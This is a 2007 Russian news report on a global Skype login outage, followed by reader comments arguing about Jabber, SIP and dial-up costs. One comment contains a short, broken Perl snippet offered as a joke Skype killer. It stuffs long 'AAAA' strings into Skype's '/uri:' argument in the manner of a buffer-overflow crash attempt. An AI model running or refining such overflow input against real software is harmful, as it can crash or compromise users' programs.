Сегодня нигде в мире не работает Skype

image

Теги: Skyp

16 августа большинство пользователей популярной программы интернет-телефонии и мгновенных сообщений Skype остались без связи.

16 августа большинство пользователей популярной программы интернет-телефонии и мгновенных сообщений Skype остались без связи. Число находящихся в сети пользователей, обычно превышающее 7 миллионов, сократилось втрое.

В середине дня на сайте компании появилось сообщение, в котором пользователям приносят извинения за проблемы, обусловленные сбоями в программе на этапе идентификации (log in). Skype обещает исправить ситуацию в пределах 12 — 24 часов. Перезагружать программу или компьютер не надо — пользователям рекомендовано просто оставить Skype в открытом состоянии, и, когда неполадки устранятся, все должно заработать само.

Кроме того, закрыта возможность скачать Skype с сайта компании. В официальном объявлении говорится, что это сделано временно, и после устранения неполадок функцию вновь включат.

Около полугода назад с аналогичными трудностями в глобальном масштабе столкнулись и пользователи популярной программы мгновенных сообщений ICQ.


или введите имя

CAPTCHA
Страницы: 1  2  3  4  5  6  7  8  
1
17-08-2007 00:29:51
ХЗ, пол дня непахал... немог приконнектится...
0 |
1
17-08-2007 00:50:30
Жду не дождусь, когда отреверсят протокол и выпустят OpenSkype
0 |
1
17-08-2007 01:33:06
хых...смысл реверсить, не прощели новый написать =)
0 |
1
17-08-2007 05:02:40
Нах реверсить или писать новый? Jabber не катит?
0 |
1
17-08-2007 07:08:24
как бесят такие типы. если у тебя анлим, то и сиди на своем жабере. сравнил бы для начала протоколы. какое качество и сколько скайп жрет.
0 |
1
17-08-2007 12:55:03
Иди денег заработай лучше, нищеброд. Скайп должен умереть.
0 |
1
17-08-2007 14:32:46
для еще одного дауна. я тебя удивлю, но в России есть такие места где ни то, что анлима нет, а диалап по 6 руб/метр если брать альтернативу скайпу - то рулит SIP, но никак не жаба
0 |
1
18-08-2007 11:40:58
Поправочка: 8 руб/метр
0 |
1
18-08-2007 18:17:37
Ага отреверсивать еще один проприетарный стандарт? Зачем? Есть SIP, есть Jabber. Skype - разрекламированный комбайн из 2 протоколов + с закрытыми протоколами и исходниками.
0 |
1
17-08-2007 04:33:32
по-моему, фразы "нигде в мире" и "у большинства пользователей" немного не одно и то же...
0 |
17-08-2007 07:25:01
+1 тоже улыбнуло)
0 |
1
17-08-2007 09:58:42
Просто у скайпа уже есть довольно большая клиентская база.
0 |
1
17-08-2007 10:35:22
Скайпо капут! #!/usr/bin/perl # Simle Code by Maranax Porex ;D # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256){ $eot='AAAA' x $i; call_sp(); } exit; sub call_sp(){ $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; }
0 |
Страницы: 1  2  3  4  5  6  7  8